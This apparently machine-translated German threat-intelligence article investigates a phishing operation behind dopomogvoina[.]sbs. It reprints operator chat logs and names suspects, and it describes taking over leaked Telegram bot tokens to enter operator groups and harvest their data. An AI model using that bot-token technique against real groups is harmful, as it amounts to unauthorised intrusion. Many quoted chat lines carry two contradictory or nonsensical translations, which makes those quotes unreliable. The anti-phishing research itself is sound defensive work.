Mach mal langsam2024-06-16 17:07
Also, du wirst mir die Fakten nennen.Also begründe das bitte
B
Mach mal langsam2024-06-16 17:07
Also, wer zum Teufel ist schuld, wer ist der Sündenbock, der ich bin?Also, wer zum Teufel ist schuld, wer ist hier der Sündenbock?
B
Mach mal langsam2024-06-16 17:07
Nichts zu sagen?Hast du nichts zu sagen?
B
Mach mal langsam2024-06-16 17:07
Oder ich konnte die verdammte PIN nicht eingeben.Oder was zum Teufel, meine Hände sind so ungeschickt, dass ich nicht mal einen Pin eingeben konnte
B
Mach mal langsam2024-06-16 17:06
Wie zum Teufel kann ein Geldautomat die Karte einklemmen?Wie zum Teufel konnte der Geldautomat die Karte einziehen?
B
Mach mal langsam2024-06-16 17:06
NietenUnterdruck
B
Mach mal langsam2024-06-16 17:06
Und du wichst für sie.Und warum zum Teufel ladet ihr das hier für sie runter?
B
Mach mal langsam2024-06-16 17:06
Ihr verdammten Naturtalente seid verdammte Idioten. Da sitzt eine verdammte Frau hier und hantiert mit ihrem Geld rum, und ihre Karte wurde vom Geldautomaten verschluckt.Ihr seid echt total bescheuert, ihr habt so einen Schwachsinn im Kopf, dass ihr euch einredet, der Geldautomat hätte ihre Karte verschluckt
B
Mach mal langsam2024-06-16 16:40
@kysia1987 – funktioniert nicht, Betrug; hat einen Dropkick verpasst und ist mit 60k fusioniert@kysia1987 – Das ist ein Betrug, ich habe eine kleine Summe investiert und 60.000 verloren

MONETTI ESCOBAR: Der stille Chef

Im krassen Gegensatz zu Bonyas 261 Beiträgen hat MONETTI nur 10 öffentliche Nachrichten — alles in einem einzigen Thread auf TraFFeeQ-Chat (Arbitrage mit schwarzem ADS-/SEO-Traffic), zur Verteidigung eines Kollegen:

TraFFeeQ-ChatDezember 2025
„Ein Mann macht seine Arbeit, er wird dafür bezahlt – was gibt es da zu diskutieren?“
Jemand macht seine Arbeit, wird dafür bezahlt – was gibt es da zu diskutieren?
Kriminelle Tätigkeiten als „einfach nur einen Job“ normalisieren
TraFFeeQ-ChatDezember 2025
„Mit dir gibt es nichts zu besprechen“
Mit dir gibt es nichts zu besprechen
Abweisende Autorität – Chefmentalität, jenseits jeder Diskussion
TraFFeeQ-ChatDezember 2025
„Es gibt noch genug anderes zu tun als dich!“
Ohne dich gibt es genug zu tun)
Das bedeutet, dass mehrere gleichzeitige Vorgänge seine Aufmerksamkeit erfordern

Die Telegram-Gruppen von MONETTI verraten den Rest: Medusa Google Ads (Black-Hat-PPC-Betrug), ein Deepfakes-Kanal (synthetische Datenträger für Betrugszwecke) sowie Marlboro-Chat (privat, unbekannt). Das Telegram-Premium-Abonnement, Geschäftszeiten rund um die Uhr und „Есть предложение“ („Ich habe einen Vorschlag“) Die Unternehmensbiografie zeichnet das Bild einer Person, die Cyberkriminalität als Vollzeitbeschäftigung betreibt.

MONETTI ESCOBAR: Vollständiges Nachrichtenprotokoll (10 Nachrichten)
MONETTI ESCOBAR (@monettiescobar) – Vollständiger übersetzter Nachrichtenverlauf
-- TraFFeeQ Chat | Traffic-Arbitrage | Black ADS/SEO | (9 Beiträge) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Lass es sein!Lass das!
ME
MONETTI ESCOBAR2025-12-06 20:42
Ein Mann macht seine ArbeitDer Mann geht seiner Arbeit nach
ME
MONETTI ESCOBAR2025-12-06 20:42
Keine AggressionKeine Aggression
ME
MONETTI ESCOBAR2025-12-06 20:40
Mach dir darüber auch keine SorgenMach dir darüber auch keine Sorgen
ME
MONETTI ESCOBAR2025-12-06 20:39
Sprich mit ihm, Mann. Das ist ihm nicht verboten.Sprich mal mit ihm, Mann, ihm wurde das nicht verboten
ME
MONETTI ESCOBAR2025-12-06 20:39
Es gibt noch jede Menge andere Dinge zu tun (außer dir!)Es gibt noch genug andere Dinge zu tun außer dir!)
ME
MONETTI ESCOBAR2025-12-06 20:39
Da gibt es nichts zu besprechenMit dir gibt es nichts zu besprechen
ME
MONETTI ESCOBAR2025-12-06 20:38
Das steht neben seinem Spitznamen. Du musst nicht draufklicken, du wirst es lesen.Neben seinem Nickname steht: „Nicht darauf klicken“, lies es dir durch
ME
MONETTI ESCOBAR2025-12-06 20:38
Der Mann macht seine Arbeit, er wird dafür bezahlt (möchte darüber sprechen)Jemand macht seine Arbeit, bekommt dafür Geld – wenn es euch gefällt, diskutiert darüber)
-- Medusa | Google Ads | Chat (1 Nachricht) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
MONETTI ESCOBAR Telegram profile
Screenshot 2 – MONETTIs Telegram-Profil.
Bonya Telegram profile
Screenshot 3 – Bonyas Profil. Beachte DC2 (Amsterdam).

Kapitel 7: Der Panikraum

Nachdem PhishDestroy über den öffentlich zugänglichen Telegram-Bot auf die Betreibergruppe zugegriffen hatte, kam es zu folgendem Austausch. Das nachstehende Chatprotokoll wurde ins Englische übersetzt, wobei der russische Originaltext kursiv beibehalten wurde. Die für den Zugriff verwendete Identität wurde unkenntlich gemacht.

Betreibergruppe – „Idr-Karte“ – Vollständiges Chatprotokoll (61 Nachrichten)
— REDACTED hat sich über ein offengelegtes Bot-Token angemeldet —
R
ZENSURIERT25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
WerWer
B
Mach mal langsam25-03-2026 13:07:14
XzХз
R
ZENSURIERT25-03-2026 13:07:14
Hallo, speichere einfach deine Daten – warte einen Moment
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Was zum TeufelWas zum Teufel
B
Mach mal langsam25-03-2026 13:07:27
ScheißeScheiße
B
Mach mal langsam25-03-2026 13:07:28
Das ist erWer denn
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Aha.Haha
ME
MONETTI ESCOBAR25-03-2026 13:07:44
Was zum Teufel?Verdammt noch mal
B
Mach mal langsam25-03-2026 13:07:53
Der Bot wurde gehacktDer Bot ist kaputt
B
Mach mal langsam25-03-2026 13:08:16
Mir wurde gesagt, unsere Verteidigung sei total im Arsch.Mir wurde übrigens gesagt, dass unsere Verteidigung echt der Hammer ist
B
Mach mal langsam25-03-2026 13:08:22
Nun, es gibt da eine ArtNa ja, da ist so ein Typ
B
Mach mal langsam25-03-2026 13:08:43
Das ist so, als würde man einen Bot über eine Phishing-Seite hacken.Bei uns ist es ein Kinderspiel, den Bot über Fish zu knacken
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[GELÖSCHT].[GESCHWÄRZT]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
Wer ist das?Wer ist das?
B
Mach mal langsam25-03-2026 13:10:29
Überprüfe dein Profil.Schau dir mal dein Profil an
B
Mach mal langsam25-03-2026 13:10:32
Es ist ein HackerDas ist ein Hacker
B
Mach mal langsam25-03-2026 13:10:35
Im wahrsten Sinne des Wortes.Im wörtlichen Sinne
B
Mach mal langsam25-03-2026 13:10:41
Übersetzt, was er channeltWas er im Kanal schreibt, wurde übersetzt
B
Mach mal langsam25-03-2026 13:10:55
[ZENSURIERT – Bonya kopiert die Nachricht aus dem Kanal, der ihre Domain gemeldet hat, und fügt sie ein, um herauszufinden, wer sie gemeldet hat]
B
Mach mal langsam25-03-2026 13:12:19
Also, ähm.Na ja, das war's dann
B
Mach mal langsam25-03-2026 13:12:23
Ich hab keine Ahnung, wer das ist.Ich hab keine Ahnung, wer das ist
B
Mach mal langsam25-03-2026 13:12:25
Aber nicht für immerAber nicht in guter
B
Mach mal langsam25-03-2026 13:12:47
@devosus Denk mal an die Verteidigung, bevor wir ordentlich eins auf die Mütze bekommen.@devosus, denk mal über den Schutz nach, bevor uns jemand den Arsch aufreißt
Anmerkung der Redaktion: Bonya spürt, dass es kommt. Nehmen wir einmal an, er sei Russe und halte es für „patriotisch“, die Ukraine zu betrügen. Wie sieht es dann mit Indonesien aus – einem BRICS-Partner seit Oktober 2024 (Gipfeltreffen in Kasan)? Ist es auch patriotisch, die Bürger der eigenen Verbündeten zu bestehlen? Betrüger aus der GUS sind Diebe, die niemanden verschonen, und die weder über Intelligenz noch über Loyalität verfügen. Lesen Sie unsere anderen Recherchen, in denen wir dokumentiert haben, Strafverfahren Bei ähnlichen Operatoren ist das Ergebnis immer dasselbe.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Ja, das kann ich verstehen.Ja, ich sehe es
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Fick dich.Was redest du da für einen Blödsinn?
B
Mach mal langsam25-03-2026 13:13:09
Na ja, ausgelaugt zu sein ist auch nicht gerade der größte Spaß.Na ja, verschmolzen zu sein, ist auch nicht gerade der Hammer
ME
MONETTI ESCOBAR25-03-2026 13:13:13
Er wird nichts tunEr wird nichts tun
ME
MONETTI ESCOBAR25-03-2026 13:13:18
Was wird er wohl tun?Was wird er verraten?
D
Devoys25-03-2026 13:13:26
Was ist das?Was ist das?
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Ja, da ist jemand dazugekommenNa, der Typ ist ja mitgemacht
D
Devoys25-03-2026 13:13:34
woherwoher
B
Mach mal langsam25-03-2026 13:13:35
Auch wenn du dich ein paar Mal mit deiner eigenen IP-Adresse auf der Phishing-Seite angemeldet hast, ist das jetzt nicht mehr in Ordnung.Selbst wenn ich schon ein paar Mal von meiner IP-Adresse aus auf Fish zugegriffen habe, macht das keinen Spaß mehr
ME
MONETTI ESCOBAR25-03-2026 13:13:37
An die GruppeZur Gruppe
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzХз
D
Devoys25-03-2026 13:13:39
bei der Interpolationwenn bei Interpol
D
Devoys25-03-2026 13:13:41
zu demzu welcher
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Dieses hierDiese
B
Mach mal langsam25-03-2026 13:13:46
Ich bin nur hierhergekommen, um ein bisschen zu plaudernHier geht's in den Chat
B
Mach mal langsam25-03-2026 13:13:49
Er schrieb, dassEr schrieb:
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Mach mal langsam25-03-2026 13:13:57
Hallo, speichere einfach deine Daten – warte einen Moment
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Foto geteilt]
D
Devoys25-03-2026 13:14:31
Die habe ich schon mal gesehen.So etwas habe ich schon gesehen
B
Mach mal langsam25-03-2026 13:14:44
Tja, wir sind auch wegen des Ukr-Bots aufgeflogen.Na ja, uns hat der ukrainische Bot auch fertiggemacht
B
Mach mal langsam25-03-2026 13:14:55
Du hast im Chatraum nichts geschrieben.Das wurde noch nicht im Chat geschrieben
B
Mach mal langsam25-03-2026 13:14:57
Hast du das nicht geschrieben?Aber nein, das haben sie geschrieben
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Das ist mir scheißegal.Ja, und scheiß drauf
B
Mach mal langsam25-03-2026 13:15:06
Im Namen des SendersIm Namen des Kanals
D
Devoys25-03-2026 13:15:23
Vergiss das doch einfach mal.Verpiss dich
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Ich mache diese Gruppe fertigIch lösche diese Gruppe
B
Mach mal langsam25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
Jaда
— Gruppe vom Eigentümer gelöscht —

Die Gruppe wurde innerhalb weniger Minuten gelöscht. Bonyas Abschiedsgruß – „+“ – und Devoys Bestätigung „ja“ sagen alles: Sie wussten, dass sie entlarvt waren, und ihre einzige Möglichkeit bestand darin, die Beweise zu vernichten. Doch zu diesem Zeitpunkt waren die Daten bereits erfasst worden.

Beachte Bonyas aufschlussreiche Bemerkung: „Wir wurden auch über den ukrainischen Bot angegriffen“ — was bestätigt, dass beide Projekte (das ukrainische und das indonesische) dasselbe Betreiberteam haben und dass dies nicht das erste Mal war, dass ihre Infrastruktur kompromittiert wurde.

Abschnitt 8: Was dies zeigt

So funktioniert PhishDestroy

Jede Domain, die auf phishdestroy.io durchläuft diese automatisierte Pipeline. dopomogvoina[.]sbs bildete da keine Ausnahme.

Erkennung
Statische Analyse
Infrastrukturkartierung
Entdeckung des Ursprungs
OSINT
Berichterstellung

Zeitplan der Ermittlungen

20. März 2026
Domain dopomogvoina[.]sbs registriert über NICENIC International
21. März 2026
Von der automatisierten Überwachungs-Pipeline von PhishDestroy erkannt
21. März 2026
Vollautomatische Analyse abgeschlossen: Infrastruktur erfasst, JS-Bundle entschlüsselt, WebSocket-Protokoll dokumentiert
22. März 2026
IP-Adresse ermittelt. Zweites Phishing-Projekt („HealthCare ID“) auf demselben Server entdeckt
22. März 2026
Enthüllt config.json führt zur Identifizierung des Betreibers über die Telegram-Bot-API
23. März 2026
Meldungen über Missbrauch, die beim Hosting-Anbieter, bei Cloudflare und bei den zuständigen CERTs eingereicht wurden
25. März 2026
Artikel veröffentlicht. Domain-Berichte sind auf PhishDestroy verfügbar

Wie das möglich war: Das Bot-Intelligenz-Netzwerk von PhishDestroy

Diese Untersuchung wurde vollständig durchgeführt von automatisierte Systeme. Die Pipeline von PhishDestroy erkennt nicht nur Phishing-Domains – sie dringt auch in die dahinterstehende Infrastruktur der Betreiber ein.

über 2.000
Telegram-Bots gesammelt
Aktiv
Einige Bots werden weiterhin überwacht
Seit 2024
Die Sammlung läuft

Wenn Phishing-Kits Telegram-Bot-Token offenlegen – wie es bei diesem hier der Fall war durch config.json — Unser System erfasst diese Daten automatisch, ordnet sie den Bedienergruppen zu, extrahiert Mitgliederlisten und archiviert den Nachrichtenverlauf. Über 2.000 Bots werden seit 2024 auf diese Weise gesammelt. Einige sind noch immer aktiv, und wir beobachten gerne in Echtzeit, wie Kriminelle vorgehen – denn das Ende steht bereits fest.

Selbst Betreiber, die ihre Konten löschen oder ihre Gruppen auflösen, kommen zu spät. Wenn sie in Panik geraten, haben wir bereits alles – Nachrichtenarchive, Profildaten, Gruppenmitgliedschaften, verbundene Bots. Das Löschen ändert nichts. Die Daten waren vorhanden, und nun befinden sie sich in unserer Datenbank.

„Warte auf mich“ – Betrüger-Edition

Dieser Fall ist kein Einzelfall – er ist ein Paradebeispiel für systematische Nachlässigkeit seitens NiceNIC den wir als Beispiel für „Mega-Hacker“ vorstellen wollten. Wie „Типичный Мошенник“ zu Recht angemerkt hat: Es gibt einen Unterschied zwischen Hackern und Betrügern — Intelligenz. Diese Betreiber sind weder Hacker noch besonders clever.

Die Systeme von PhishDestroy sammeln automatisch Beweismaterial dieser Art über Tausende von Domains hinweg – sie erfassen Bots, archivieren die Kommunikation der Betreiber und erstellen Karten der Infrastruktur. Dieser spezielle Fall war einfach zu absurd, um ihn nicht zu veröffentlichen. Das Phishing-Kit ist Standardware, es gibt keinerlei Sicherheitsvorkehrungen, und die Betreiber haben ihre Gruppe innerhalb weniger Minuten nach der Entdeckung in ihrer Panik gelöscht.

Wir entwickeln ein System, das Folgendes anzeigen wird Überprüfte Betreiberidentitäten direkt auf den Domain-Berichtsseiten — vom Betrüger zum Opfer, wie in der russischen Fernsehsendung „Жди Меня“ (Warte auf mich), nur umgekehrt. Die Sendung läuft seit 2024 im geschlossenen Modus. Viele Betreiber sind bereits identifiziert – darunter auch solche, die ihre Konten gelöscht haben. Wir entscheiden gerade, wer am meisten interessant Eine tolle Art, das zu präsentieren. Bleibt dran.

Verwandte Domains

Unsere Analyse hat einen zweiten Bereich identifiziert — hlpforvpeople[.]sbs — die über denselben Registrar registriert wurden und übereinstimmende Infrastrukturmerkmale aufweisen. Beide Domains sind in unserer Datenbank erfasst:

Nichteinhaltung der Vorschriften durch den Registrar: NICENIC International

Die NICENIC International Group Co., Limited (Hongkong) hat mehrere detaillierte Missbrauchsberichte von PhishDestroy zu beiden dopomogvoina[.]sbs und hlpforvpeople[.]sbs. Zum Zeitpunkt der Veröffentlichung — 5 Tage nach der ersten Meldung — Es wurden keine Maßnahmen ergriffen. Beide Domains sind weiterhin voll funktionsfähig.

Dies ist kein Einzelfall. NICENIC ist ein Problem, das bei unseren Untersuchungen immer wieder auftaucht. Die Missbrauchsmeldestelle des Registrars (abuse@nicenic.net) reagiert durchweg nicht auf mit Beweisen belegte Phishing-Meldungen. Obwohl NICENIC ein von der ICANN akkreditierter Registrar ist, der an die Bestimmungen des Registrar Accreditation Agreement (RAA §3.18) gebunden ist, agiert das Unternehmen offenbar ungestraft.

NICENIC ist auch auf Russisch vertreten und verkauft .ru Domains zu Premiumpreisen (~200 $) und kommuniziert mit Kunden über VK und Telegram – Plattformen, die bei russischsprachigem Publikum beliebt sind. Die Überschneidung ihres Kundenstamms mit Untergrund-Communities wirft ernsthafte Fragen auf, ob die Nichtbeantwortung von Missbrauchsmeldungen durch den Registrar auf Fahrlässigkeit oder auf eine bewusste Geschäftsstrategie zurückzuführen ist.

Diese Untersuchung wurde teilweise veröffentlicht aufgrund der anhaltenden Untätigkeit von NICENIC. Wenn Registrare sich weigern, gegen Phishing-Missbrauch vorzugehen, bleibt die öffentliche Anprangerung als einziger Mechanismus zur Rechenschaftspflicht übrig.

Das Wichtigste in Kürze

  • Nur durch Automatisierung kann man Schritt halten. Phishing-Kits werden innerhalb weniger Stunden bereitgestellt und einsatzbereit gemacht. Eine manuelle Überprüfung kann da nicht mithalten.
  • Bediener machen Fehler. Eine ungeschützte Konfigurationsdatei in einem Nebenprojekt deckte eine ganze multinationale Phishing-Operation auf. Es ist schwierig, in jedem Projekt eine lückenlose OPSEC aufrechtzuerhalten.
  • Social Engineering entwickelt sich mit dem Nachrichtenzyklus weiter. Krieg, humanitäre Hilfe und staatliche Programme werden zunehmend als Vorwand für Phishing-Angriffe missbraucht, da sie Menschen in Not ansprechen, die die Legitimität solcher Angebote weniger hinterfragen.
  • Die Wiederverwendung von Infrastruktur ist die Regel. Ein Server, zwei Phishing-Projekte, zwei Länder, dieselben Betreiber. Die Verfolgung von Infrastrukturverbindungen liefert weitaus mehr Erkenntnisse als die isolierte Analyse einer einzelnen Domain.

Verwandte Forschungsarbeiten

Weitere Untersuchungen aus der automatisierten Informationspipeline von PhishDestroy

TrustWallet-Panel aufgedeckt
Einbruch in das Admin-Panel deckt eine länderübergreifende Krypto-Phishing-Aktion auf, bei der Chat-Protokolle der Betreiber auftauchen.
Krypto-Drainer-Netzwerke aufgedeckt
Eine Bestandsaufnahme der Infrastruktur hinter Phishing-Kits, die auf DeFi-Nutzer abzielen und deren Wallets leeren.
NiceNIC: Ein Registrar, der Cyberkriminalität ermöglicht
Wie ein von der ICANN akkreditierter Registrar Missbrauchsmeldungen systematisch ignoriert – auch im Rahmen dieser Untersuchung.
XMRWallet entlarvt: 10 Jahre gestohlene Schlüssel
Ein jahrzehntelanger Betrug mit Monero-Wallets wurde durch JavaScript-Analyse und Domain-Forensik aufgedeckt.
Betrugsinfrastruktur aufgedeckt
Geteiltes Hosting, gemeinsame Betreiber – wie Phishing-Netzwerke ihre Infrastruktur kampagnenübergreifend wiederverwenden.
BuyTRX Drainer entlarvt
Ein auf TRON basierender Energiebetrug, der durch die Genehmigung bösartiger Smart Contracts Geldbörsen leert.

Haftungsausschluss: Diese Untersuchung wurde ausschließlich mittels passiver Aufklärung und öffentlicher APIs durchgeführt. Es erfolgte kein unbefugter Zugriff auf irgendein System. Bei den Aufrufen der Telegram-Bot-API wurde ein Token verwendet, das von den Betreibern in einem nicht authentifizierten Endpunkt öffentlich zugänglich gemacht worden war. Alle Domainnamen in diesem Artikel wurden gemäß den üblichen InfoSec-Konventionen unkenntlich gemacht.

Diese Untersuchung teilen

X / Twitter Telegram Reddit LinkedIn

Verwandte Untersuchungen

Anatomy of Crypto Phishing: 8 Real Seed Phrase Stealers Reverse-Engineered
GRÜNDLICHE UNTERSUCHUNG
Die Anatomie des Krypto-Phishing: 8 echte Seed-Phrase-Stealer im Rückentwicklungsverfahren
Scammers Exposed: 4 Scam Backends Dissected
UNTERSUCHUNG
Betrüger entlarvt: 4 Betrugsplattformen unter der Lupe
$0 Takedowns: How We Disrupt Phishing Infrastructure
UNTERSUCHUNG
Kostenlose Abschaltungen: Wie wir Phishing-Infrastrukturen zerschlagen